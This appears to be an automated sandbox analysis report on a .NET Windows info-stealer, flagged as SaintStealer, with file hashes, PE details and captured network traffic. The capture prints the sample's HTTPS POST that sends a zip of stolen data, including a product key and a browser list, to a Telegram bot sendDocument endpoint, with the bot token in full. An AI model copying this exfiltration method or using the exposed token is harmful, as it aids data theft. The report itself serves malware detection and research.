                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                        Category:dropped
                                                                                        Size (bytes):51200
                                                                                        Entropy (8bit):0.8746135976761988
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\tmpB10F.tmp.dat

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                        Category:dropped
                                                                                        Size (bytes):20480
                                                                                        Entropy (8bit):0.6732424250451717
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\tmpB110.tmp.dat

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                        Category:dropped
                                                                                        Size (bytes):196608
                                                                                        Entropy (8bit):1.121297215059106
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\tmpB111.tmp.dat

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                        Category:dropped
                                                                                        Size (bytes):196608
                                                                                        Entropy (8bit):1.121297215059106
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\tmpB122.tmp.dat

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                        Category:dropped
                                                                                        Size (bytes):196608
                                                                                        Entropy (8bit):1.121297215059106
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                        Category:dropped
                                                                                        Size (bytes):1835008
                                                                                        Entropy (8bit):4.421773873160502
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:DSvfpi6ceLP/9skLmb0OTKWSPHaJG8nAgeMZMMhA2fX4WABlEnNS0uhiTw:OvloTKW+EZMM6DFy403w
                                                                                        MD5:F19EEF4E1D01B4D32389DDA0899535CC
                                                                                        SHA1:589A4DECA9BA8CF63B89A1303960BC92DE394EA3
                                                                                        SHA-256:E5D01CA74809505D7D1CBD8DA6FA3EFF9EBF49B3D493D8040C023AD89E60096F
                                                                                        SHA-512:DAD5BCC59E3BB01CE04E148F3DF26A292355AC8AFB1D639D87F251DD0EF7486FEB84F941461D3D67198CB4F12B20CA1BB441AF9B20ED4E8D39F341A4C6EFA045
                                                                                        Malicious:false
                                                                                        Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....P...............................................................................................................................................................................................................................................................................................................................................e.#........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):5.781938114168424
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        File name:zyEDYRU0jw.exe
                                                                                        File size:171'008 bytes
                                                                                        MD5:41d3660b5321768122f4c25ac9868fc3
                                                                                        SHA1:d42e3c5fc24e309581819cba723b14c3c247d824
                                                                                        SHA256:c43a34e78ba6913551af41857fb63a3545acd6a9248e8a4de884988b3ccf895d
                                                                                        SHA512:e02797980f11075715499878f06cfcb71a12da81f8b62f7c30deb31b831137472c450b95f5ebe9349a4205041b6f65c6468d217c2fa36a91902f75c7d5aed549
                                                                                        SSDEEP:3072:oBYHQAFbcjCdDK8l8wqxrytfAndlzFvxHebZ5h2jgSw6KXwApEnB:oBYHjajw5lB2LzdxHeblqk6K
                                                                                        TLSH:27F34C6833FD4A19F3BF4A3998B4919046BAF9A56933D75D598030FC2A327C1DA10B73
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5............."...0.................. ........@.. ....................................`................................

                                                                                        File Icon

                                                                                        Icon Hash:00928e8e8686b000

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x42a602
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0xB880F835 [Fri Feb 3 01:58:13 2068 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        push ecx
                                                                                        hlt
                                                                                        cmpsd
                                                                                        push eax
                                                                                        jle 00007F4AF471BFC3h
                                                                                        push ebx
                                                                                        sbb dl, byte ptr [edi]
                                                                                        movsb
                                                                                        ret
                                                                                        cmp ah, byte ptr [edi]
                                                                                        pop esi
                                                                                        xchg eax, esi
                                                                                        cmp ebp, dword ptr [ebx-62E03495h]
                                                                                        inc ebp
                                                                                        int1
                                                                                        lodsb
                                                                                        cli
                                                                                        pop eax
                                                                                        stosd
                                                                                        dec ebx
                                                                                        jecxz 00007F4AF471BF85h
                                                                                        xchg eax, ebx
                                                                                        and byte ptr [eax], dh
                                                                                        cli
                                                                                        push ebp
                                                                                        lodsd
                                                                                        jbe 00007F4AF471BFEFh
                                                                                        test byte ptr [eax-0A6E8934h], 00000002h
                                                                                        dec esp
                                                                                        and eax, FCD7E54Fh
                                                                                        lds ebp, fword ptr [edx]
                                                                                        retf
                                                                                        xlatb
                                                                                        xor eax, 62B58044h
                                                                                        mov dword ptr [5AB1DE8Fh], eax
                                                                                        dec ecx
                                                                                        and eax, 45671BBAh
                                                                                        jmp far E1C0h : FE5D980Eh
                                                                                        ret
                                                                                        das
                                                                                        jne 00007F4AF471BF84h
                                                                                        or dword ptr [eax+esi*8+12h], A397468Dh
                                                                                        imul edx, ebx, F9h
                                                                                        mov byte ptr [ebx], FFFFFF8Fh
                                                                                        pop edi
                                                                                        out 15h, eax
                                                                                        xchg eax, edx
                                                                                        pushfd
                                                                                        xchg eax, ebp
                                                                                        mov edi, 95EB7A6Dh
                                                                                        push edx
                                                                                        pop ecx
                                                                                        fcmovbe st(0), st(4)
                                                                                        mov esi, 74582D83h
                                                                                        and ebx, edx
                                                                                        dec ecx
                                                                                        loopne 00007F4AF471BFEBh
                                                                                        sub dword ptr [esi+7544C8C9h], ecx
                                                                                        retn 6A89h
                                                                                        hlt
                                                                                        mov seg?, word ptr [ecx+78h]
                                                                                        cdq
                                                                                        pop eax
                                                                                        imul esp, dword ptr [edi], B9h
                                                                                        jno 00007F4AF471BF5Fh
                                                                                        mov esi, F0B64FE1h
                                                                                        mov byte ptr [ebp-53DF36E9h], ch
                                                                                        jnl 0000BF51h
                                                                                        cmp dh, byte ptr [ebx-1AE7B521h]
                                                                                        sbb dh, byte ptr [ecx]
                                                                                        adc byte ptr [edi+62603351h], 00000053h
                                                                                        jnle 00007F4AF471BFC7h
                                                                                        mov cl, 64h
                                                                                        jnbe 00007F4AF471BF62h
                                                                                        mov ebx, FE84AE6Bh
                                                                                        and dword ptr [eax+2B08F91Ch], 00487094h

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2a5b00x4f.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x5d0.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e0000xc.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x2a5140x38.text
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000x290680x2920076b77f85cd4aa4ab9dddb98589135befFalse0.4165202317629179data5.80755836163704IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0x2c0000x5d00x600f08edb0240cdcebdcca1b93f0f59732aFalse0.4427083333333333data4.28181878845981IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x2e0000xc0x2000f9136305b308c6636cd9d39e281f797False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_VERSION0x2c0900x340data0.45072115384615385
                                                                                        RT_MANIFEST0x2c3e00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                        Imports

                                                                                        DLLImport
                                                                                        mscoree.dll_CorExeMain

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-17T19:47:11.098387+01002843856ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M21192.168.2.549708149.154.167.220443TCP
                                                                                        2024-12-17T19:47:12.021049+01002039009ET MALWARE Win32/SaintStealer CnC Response1149.154.167.220443192.168.2.549708TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 17, 2024 19:47:00.098370075 CET4970480192.168.2.5104.16.184.241
                                                                                        Dec 17, 2024 19:47:00.221230984 CET8049704104.16.184.241192.168.2.5
                                                                                        Dec 17, 2024 19:47:00.221339941 CET4970480192.168.2.5104.16.184.241
                                                                                        Dec 17, 2024 19:47:00.221699953 CET4970480192.168.2.5104.16.184.241
                                                                                        Dec 17, 2024 19:47:00.341557026 CET8049704104.16.184.241192.168.2.5
                                                                                        Dec 17, 2024 19:47:01.323802948 CET8049704104.16.184.241192.168.2.5
                                                                                        Dec 17, 2024 19:47:01.367625952 CET4970480192.168.2.5104.16.184.241
                                                                                        Dec 17, 2024 19:47:09.018275023 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:09.018327951 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:09.019009113 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:09.062027931 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:09.062047958 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:10.454997063 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:10.455311060 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:10.498305082 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:10.498375893 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:10.499399900 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:10.664638042 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:10.697889090 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:10.722799063 CET4970480192.168.2.5104.16.184.241
                                                                                        Dec 17, 2024 19:47:10.739337921 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:10.843352079 CET8049704104.16.184.241192.168.2.5
                                                                                        Dec 17, 2024 19:47:10.843415022 CET4970480192.168.2.5104.16.184.241
                                                                                        Dec 17, 2024 19:47:11.091777086 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.091823101 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.097846031 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.097872972 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.097984076 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.097992897 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098026037 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098031998 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098058939 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098064899 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098088980 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098097086 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098118067 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098125935 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098156929 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098165035 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098181009 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098189116 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098226070 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098232031 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098315001 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098321915 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098398924 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098407030 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098464966 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098472118 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098543882 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098548889 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098589897 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098596096 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098690033 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098699093 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098718882 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098731995 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098732948 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098757982 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098778009 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098783970 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098814011 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098819971 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098859072 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098865986 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098932028 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098938942 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098974943 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098980904 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.099057913 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.099064112 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.099217892 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.099222898 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.111116886 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.199177980 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:12.018671036 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:12.020418882 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:12.020555973 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:12.020634890 CET49708443192.168.2.5149.154.167.220

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 17, 2024 19:46:59.868026972 CET6395953192.168.2.51.1.1.1
                                                                                        Dec 17, 2024 19:47:00.005353928 CET53639591.1.1.1192.168.2.5
                                                                                        Dec 17, 2024 19:47:01.873634100 CET5116853192.168.2.51.1.1.1
                                                                                        Dec 17, 2024 19:47:02.026310921 CET53511681.1.1.1192.168.2.5
                                                                                        Dec 17, 2024 19:47:08.873595953 CET6050653192.168.2.51.1.1.1
                                                                                        Dec 17, 2024 19:47:09.011013985 CET53605061.1.1.1192.168.2.5

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 17, 2024 19:46:59.868026972 CET192.168.2.51.1.1.10x2296Standard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                                                        Dec 17, 2024 19:47:01.873634100 CET192.168.2.51.1.1.10xc8dStandard query (0)238.14.8.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                        Dec 17, 2024 19:47:08.873595953 CET192.168.2.51.1.1.10xc4c4Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 17, 2024 19:47:00.005353928 CET1.1.1.1192.168.2.50x2296No error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                                                        Dec 17, 2024 19:47:00.005353928 CET1.1.1.1192.168.2.50x2296No error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                                                        Dec 17, 2024 19:47:02.026310921 CET1.1.1.1192.168.2.50xc8dName error (3)238.14.8.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                        Dec 17, 2024 19:47:09.011013985 CET1.1.1.1192.168.2.50xc4c4No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • api.telegram.org
                                                                                        • icanhazip.com

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.549704104.16.184.241801352C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 17, 2024 19:47:00.221699953 CET63OUTGET / HTTP/1.1
                                                                                        Host: icanhazip.com
                                                                                        Connection: Keep-Alive
                                                                                        Dec 17, 2024 19:47:01.323802948 CET535INHTTP/1.1 200 OK
                                                                                        Date: Tue, 17 Dec 2024 18:47:01 GMT
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 13
                                                                                        Connection: keep-alive
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET
                                                                                        Set-Cookie: __cf_bm=5vYa03N7BbqR9KmIecf_rtCGeGVKBqLLgyUZy44__5s-1734461221-1.0.1.1-0_qB8YAWU8UOaTQu3HLSF65yHJCeVHu0HgPXswDR.F9z6bt2M4uXBpyh3EI5ARbRnisjZxSNTagL9Ei2QsiD4w; path=/; expires=Tue, 17-Dec-24 19:17:01 GMT; domain=.icanhazip.com; HttpOnly
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f3914484ee64332-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a
                                                                                        Data Ascii: 8.46.123.189


                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.549708149.154.167.2204431352C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-17 18:47:10 UTC258OUTPOST /bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocument HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary="6b29678b-5dd7-4ef1-9acd-f26ecdf2bb88"
                                                                                        Host: api.telegram.org
                                                                                        Content-Length: 89443
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-17 18:47:11 UTC40OUTData Raw: 2d 2d 36 62 32 39 36 37 38 62 2d 35 64 64 37 2d 34 65 66 31 2d 39 61 63 64 2d 66 32 36 65 63 64 66 32 62 62 38 38 0d 0a
                                                                                        Data Ascii: --6b29678b-5dd7-4ef1-9acd-f26ecdf2bb88
                                                                                        2024-12-17 18:47:11 UTC125OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 45 4e 5d 38 2e 34 36 2e 31 32 33 2e 31 38 39 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 25 35 42 45 4e 25 35 44 38 2e 34 36 2e 31 32 33 2e 31 38 39 2e 7a 69 70 0d 0a 0d 0a
                                                                                        Data Ascii: Content-Disposition: form-data; name=document; filename="[EN]8.46.123.189.zip"; filename*=utf-8''%5BEN%5D8.46.123.189.zip
                                                                                        2024-12-17 18:47:11 UTC4096OUTData Raw: 50 4b 03 04 14 00 00 00 08 00 dc 6d 91 59 4d 98 f4 36 1f 00 00 00 1d 00 00 00 0e 00 00 00 50 72 6f 64 75 63 74 4b 65 79 2e 74 78 74 b3 34 8f 70 33 d2 f5 0b 32 31 8e d0 0d f1 b6 88 f4 d5 f5 0e 33 77 f7 d5 0d 30 0e 0f 8b 00 00 50 4b 03 04 14 00 00 00 08 00 dd 6d 91 59 7e 4b ef fb e5 00 00 00 e2 02 00 00 15 00 00 00 49 6e 73 74 61 6c 6c 65 64 42 72 6f 77 73 65 72 73 2e 74 78 74 ed 90 31 6f c2 30 10 85 67 e7 57 78 84 c5 3a 07 13 42 b7 16 b5 a8 03 15 53 59 6e b1 c2 25 58 72 72 91 93 4a 11 bf be 2e 81 aa 25 73 b7 4e b6 de 7b fe fc ee de 6c 4d 62 6f fb 93 78 a7 d0 39 6e 92 1d 9f 9d f7 56 be b8 40 25 0f 62 f3 80 fb c0 55 b0 75 94 3c 75 78 17 c0 72 3c 15 0d 24 b4 ce 15 28 9d 6c 99 2b 4f 72 73 0a 1c f9 13 c4 68 e3 68 e3 63 db 7a 57 d8 3e fe 8e c5 45 ba b2 56 91 b5
                                                                                        Data Ascii: PKmYM6ProductKey.txt4p3213w0PKmY~KInstalledBrowsers.txt1o0gWx:BSYn%XrrJ.%sN{lMbox9nV@%bUu<uxr<$(l+OrshhczW>EV
